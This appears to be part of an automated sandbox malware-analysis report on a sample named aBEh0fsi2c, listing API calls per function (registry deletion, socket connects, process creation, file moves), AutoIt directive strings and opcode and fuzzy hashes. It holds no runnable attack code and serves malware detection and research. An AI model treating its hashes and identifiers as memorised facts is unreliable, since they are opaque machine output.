                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: MessagePost$KeyboardState$Parent
                                                          • String ID:
                                                          • API String ID: 87235514-0
                                                          • Opcode ID: 153ff2766004976dec29a969f68c4d34128b2767c58521d885998223fc31581c
                                                          • Instruction ID: 2f009db5b477ad21b6e93d35450907194b5f3e92229310a909daf833d3e7a168
                                                          • Opcode Fuzzy Hash: 153ff2766004976dec29a969f68c4d34128b2767c58521d885998223fc31581c
                                                          • Instruction Fuzzy Hash: 2A5105A0544BD5BDFB3B83748C55F7ABEA95B06300F08898DE1D5DA8C3C395AC88E760
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: _wcsncpy$LocalTime
                                                          • String ID:
                                                          • API String ID: 2945705084-0
                                                          • Opcode ID: 181e2463982d6bfe5539de2334fe06f256dce4e15838f9a9234b8a53ff9cf96e
                                                          • Instruction ID: add3ac2ef1f3c15f229b22168e4957a07f960fa1781d0cc4e557a637d3856c08
                                                          • Opcode Fuzzy Hash: 181e2463982d6bfe5539de2334fe06f256dce4e15838f9a9234b8a53ff9cf96e
                                                          • Instruction Fuzzy Hash: 91417375C1171876CB13FBF48C86ACFB3B89F05310F508996E918E7221EB34A695C7A6
                                                          APIs
                                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 003BD5D4
                                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 003BD60A
                                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 003BD61B
                                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 003BD69D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                                          • String ID: ,,?$DllGetClassObject
                                                          • API String ID: 753597075-2169313111
                                                          • Opcode ID: a0aec1666e6d1213ebbcbe5ca786efcda7d304b8e2bc700e2ad1b45d814eb6c8
                                                          • Instruction ID: f59c35df17f43520a46ec7f7df7f63a045b3479666a66c51b8174c56bf1f1195
                                                          • Opcode Fuzzy Hash: a0aec1666e6d1213ebbcbe5ca786efcda7d304b8e2bc700e2ad1b45d814eb6c8
                                                          • Instruction Fuzzy Hash: 9C4192B5600204EFDB16CF54C884BDABBB9EF44318F1581A9EE099F645E7B1DD40CBA0
                                                          APIs
                                                            • Part of subcall function 003C466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003C3697,?), ref: 003C468B
                                                            • Part of subcall function 003C466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003C3697,?), ref: 003C46A4
                                                          • lstrcmpiW.KERNEL32(?,?), ref: 003C36B7
                                                          • _wcscmp.LIBCMT ref: 003C36D3
                                                          • MoveFileW.KERNEL32(?,?), ref: 003C36EB
                                                          • _wcscat.LIBCMT ref: 003C3733
                                                          • SHFileOperationW.SHELL32(?), ref: 003C379F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                          • String ID: \*.*
                                                          • API String ID: 1377345388-1173974218
                                                          • Opcode ID: c6af9a79f1d2a76d5f57a99b496816427fcfd4e1a4bf919b1f68da7e43602877
                                                          • Instruction ID: d02c9fef834dc5e23815ae17e19230bae08037f65c784b700c66a5e9dc7b7fad
                                                          • Opcode Fuzzy Hash: c6af9a79f1d2a76d5f57a99b496816427fcfd4e1a4bf919b1f68da7e43602877
                                                          • Instruction Fuzzy Hash: 4A417FB1508344AEC753EF64C891EDF77ECAF89340F00496EB499C7251EA34DA89C756
                                                          APIs
                                                          • _memset.LIBCMT ref: 003E72AA
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003E7351
                                                          • IsMenu.USER32(?), ref: 003E7369
                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003E73B1
                                                          • DrawMenuBar.USER32 ref: 003E73C4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$DrawInfoInsert_memset
                                                          • String ID: 0
                                                          • API String ID: 3866635326-4108050209
                                                          • Opcode ID: 1708645f9d319fc0058ac6a8720c130c4c13acb6a88027e6b17d6b661215ea4e
                                                          • Instruction ID: d134dbc700807f5d3bdf510242196e75022bb8251088be1683fdc1e40487003b
                                                          • Opcode Fuzzy Hash: 1708645f9d319fc0058ac6a8720c130c4c13acb6a88027e6b17d6b661215ea4e
                                                          • Instruction Fuzzy Hash: 6F415C75600259EFDB21DF51D884A9ABBF8FB05310F15862AFD059B290C770AD10DFA0
                                                          APIs
                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 003E0FD4
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003E0FFE
                                                          • FreeLibrary.KERNEL32(00000000), ref: 003E10B5
                                                            • Part of subcall function 003E0FA5: RegCloseKey.ADVAPI32(?), ref: 003E101B
                                                            • Part of subcall function 003E0FA5: FreeLibrary.KERNEL32(?), ref: 003E106D
                                                            • Part of subcall function 003E0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 003E1090
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 003E1058
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                          • String ID:
                                                          • API String ID: 395352322-0
                                                          • Opcode ID: f1ddcd235facbfd77223200115a043afe8df0570439768c30cc32524889a860d
                                                          • Instruction ID: 995aba2f21bc17eed292690256eafb0f9246057cb9ce048bb385cf836106850d
                                                          • Opcode Fuzzy Hash: f1ddcd235facbfd77223200115a043afe8df0570439768c30cc32524889a860d
                                                          • Instruction Fuzzy Hash: 7E310F71901159BFDB26DF91DC89EFFB7BCEF08310F000269E511A6191D6745E899AA0
                                                          APIs
                                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 003E62EC
                                                          • GetWindowLongW.USER32(00E0CFA0,000000F0), ref: 003E631F
                                                          • GetWindowLongW.USER32(00E0CFA0,000000F0), ref: 003E6354
                                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 003E6386
                                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 003E63B0
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 003E63C1
                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003E63DB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: LongWindow$MessageSend
                                                          • String ID:
                                                          • API String ID: 2178440468-0
                                                          • Opcode ID: 4bfc60c14d37d84ee49da08a838fbbc885e7fbeb662669eff4cf7422026698ff
                                                          • Instruction ID: 0c9217ecdbe77db21f7627641f2e82dbea3c6ba734e2836b74a5558f54a73120
                                                          • Opcode Fuzzy Hash: 4bfc60c14d37d84ee49da08a838fbbc885e7fbeb662669eff4cf7422026698ff
                                                          • Instruction Fuzzy Hash: A93116346402A09FDB22DF1ADC85F5837E5FB5A754F190264F510DF2F2CBB1A8408B51
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003BDB2E
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003BDB54
                                                          • SysAllocString.OLEAUT32(00000000), ref: 003BDB57
                                                          • SysAllocString.OLEAUT32(?), ref: 003BDB75
                                                          • SysFreeString.OLEAUT32(?), ref: 003BDB7E
                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 003BDBA3
                                                          • SysAllocString.OLEAUT32(?), ref: 003BDBB1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                          • String ID:
                                                          • API String ID: 3761583154-0
                                                          • Opcode ID: fe7c41beb71f807fef0553fb224bfcd8e51899160742e39f9df2f0778a5675f7
                                                          • Instruction ID: 6b9cb70e32e6d7c40ad34ce380f735ce4a0410559008c3cff9657f3f90cbd9d3
                                                          • Opcode Fuzzy Hash: fe7c41beb71f807fef0553fb224bfcd8e51899160742e39f9df2f0778a5675f7
                                                          • Instruction Fuzzy Hash: 08219236600219AFDF11EFA9DC88CFB73ACEB09364B018565FA14DB6A0E6709D458B60
                                                          APIs
                                                            • Part of subcall function 003D7D8B: inet_addr.WSOCK32(00000000), ref: 003D7DB6
                                                          • socket.WSOCK32(00000002,00000001,00000006), ref: 003D61C6
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003D61D5
                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 003D620E
                                                          • connect.WSOCK32(00000000,?,00000010), ref: 003D6217
                                                          • WSAGetLastError.WSOCK32 ref: 003D6221
                                                          • closesocket.WSOCK32(00000000), ref: 003D624A
                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 003D6263
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                          • String ID:
                                                          • API String ID: 910771015-0
                                                          • Opcode ID: 291a803e8fefe33624876894dd8f06615f91688f1726d48f3fc336ee1edcce62
                                                          • Instruction ID: 0874b6e8859931b423ed68a422c59770b2f15c469cdbe1156fd8f5a51fe15692
                                                          • Opcode Fuzzy Hash: 291a803e8fefe33624876894dd8f06615f91688f1726d48f3fc336ee1edcce62
                                                          • Instruction Fuzzy Hash: C531D572600104AFEF11AF24DC86BBD77ADEF45750F04842AFD159B291DB70AC048BA1
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp
                                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                          • API String ID: 1038674560-2734436370
                                                          • Opcode ID: fe67fe636a66fbf1b4a44baaefcc8d2f6cfa4dd8ef5d02a0febd9dc94a8d04a9
                                                          • Instruction ID: 5f114c2510c0ced898e4a8f4365868f10f98ed100b7d9e29dc4393698db56a20
                                                          • Opcode Fuzzy Hash: fe67fe636a66fbf1b4a44baaefcc8d2f6cfa4dd8ef5d02a0febd9dc94a8d04a9
                                                          • Instruction Fuzzy Hash: F9212572205611AFD223B634AC03FF77398EF55788B11507AFA458A951EB909E42C395
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003BDC09
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003BDC2F
                                                          • SysAllocString.OLEAUT32(00000000), ref: 003BDC32
                                                          • SysAllocString.OLEAUT32 ref: 003BDC53
                                                          • SysFreeString.OLEAUT32 ref: 003BDC5C
                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 003BDC76
                                                          • SysAllocString.OLEAUT32(?), ref: 003BDC84
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                          • String ID:
                                                          • API String ID: 3761583154-0
                                                          • Opcode ID: 478bd36d3d8727fe683755f52e92f728b8005f74a7c1553e2ca7c50f6eb995f2
                                                          • Instruction ID: aca72efe8967c5b629f467a6315d59e8c68a0450ad798c92abb19f6a3768d297
                                                          • Opcode Fuzzy Hash: 478bd36d3d8727fe683755f52e92f728b8005f74a7c1553e2ca7c50f6eb995f2
                                                          • Instruction Fuzzy Hash: AD217435604205AF9B15EFA9DC88DFB77ECEB08364B118125FA14CB6E1E6B0DC41CB64
                                                          APIs
                                                            • Part of subcall function 00361D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00361D73
                                                            • Part of subcall function 00361D35: GetStockObject.GDI32(00000011), ref: 00361D87
                                                            • Part of subcall function 00361D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00361D91
                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 003E7632
                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 003E763F
                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 003E764A
                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 003E7659
                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 003E7665
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                          • String ID: Msctls_Progress32
                                                          • API String ID: 1025951953-3636473452
                                                          • Opcode ID: 261774995b98c691d46fcd24c0d42778d7ab97fdcb7080a9aaf8511822c944a4
                                                          • Instruction ID: 1ca63347fcfabba9b06d61ef5b3d98a5499b4664e2356cc2877e29b6133696d9
                                                          • Opcode Fuzzy Hash: 261774995b98c691d46fcd24c0d42778d7ab97fdcb7080a9aaf8511822c944a4
                                                          • Instruction Fuzzy Hash: AB11B6B1150129BFEF118F65CC85EE77F5DEF08798F114215F604A6090C7729C21DBA4
                                                          APIs
                                                          • __init_pointers.LIBCMT ref: 00389AE6
                                                            • Part of subcall function 00383187: EncodePointer.KERNEL32(00000000), ref: 0038318A
                                                            • Part of subcall function 00383187: __initp_misc_winsig.LIBCMT ref: 003831A5
                                                            • Part of subcall function 00383187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00389EA0
                                                            • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00389EB4
                                                            • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00389EC7
                                                            • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00389EDA
                                                            • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00389EED
                                                            • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00389F00
                                                            • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00389F13
                                                            • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00389F26
                                                            • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00389F39
                                                            • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00389F4C
                                                            • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00389F5F
                                                            • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00389F72
                                                            • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00389F85
                                                            • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00389F98
                                                            • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00389FAB
                                                            • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00389FBE
                                                          • __mtinitlocks.LIBCMT ref: 00389AEB
                                                          • __mtterm.LIBCMT ref: 00389AF4
                                                            • Part of subcall function 00389B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00389AF9,00387CD0,0041A0B8,00000014), ref: 00389C56
                                                            • Part of subcall function 00389B5C: _free.LIBCMT ref: 00389C5D
                                                            • Part of subcall function 00389B5C: DeleteCriticalSection.KERNEL32(02B,?,?,00389AF9,00387CD0,0041A0B8,00000014), ref: 00389C7F
                                                          • __calloc_crt.LIBCMT ref: 00389B19
                                                          • __initptd.LIBCMT ref: 00389B3B
                                                          • GetCurrentThreadId.KERNEL32 ref: 00389B42
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                          • String ID:
                                                          • API String ID: 3567560977-0
                                                          • Opcode ID: 18f4fc06bbf2b531de8ac95654cb491a282d86c2f1e4bf22fffad3160fce6c1d
                                                          • Instruction ID: 4c995edd790c22a5aab8edfa7e60d6572c0e06003f26e42c97bf292fbed6e2c8
                                                          • Opcode Fuzzy Hash: 18f4fc06bbf2b531de8ac95654cb491a282d86c2f1e4bf22fffad3160fce6c1d
                                                          • Instruction Fuzzy Hash: B7F0F0322193115AE63B7775BC037AA2690DF02730F294AEBF820DE0D2FF20880143A4
                                                          APIs
                                                          • _memset.LIBCMT ref: 003EB644
                                                          • _memset.LIBCMT ref: 003EB653
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00426F20,00426F64), ref: 003EB682
                                                          • CloseHandle.KERNEL32 ref: 003EB694
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: _memset$CloseCreateHandleProcess
                                                          • String ID: oB$doB
                                                          • API String ID: 3277943733-2474204165
                                                          • Opcode ID: 244b7d89f2c904f521b3a5dabafcbc18a98352f5f573d4fa25c99a4ad2907fb4
                                                          • Instruction ID: 8e90c14475dd40336a24aafa8c9cecf98d4e6b6988429cb10abf83470bbb5710
                                                          • Opcode Fuzzy Hash: 244b7d89f2c904f521b3a5dabafcbc18a98352f5f573d4fa25c99a4ad2907fb4
                                                          • Instruction Fuzzy Hash: FBF05EB6640350BEEA222761BD46FBB7A9CEB08395F424031BA08E9196D7754C0187AC
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00383F85), ref: 00384085
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0038408C
                                                          • EncodePointer.KERNEL32(00000000), ref: 00384097
                                                          • DecodePointer.KERNEL32(00383F85), ref: 003840B2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
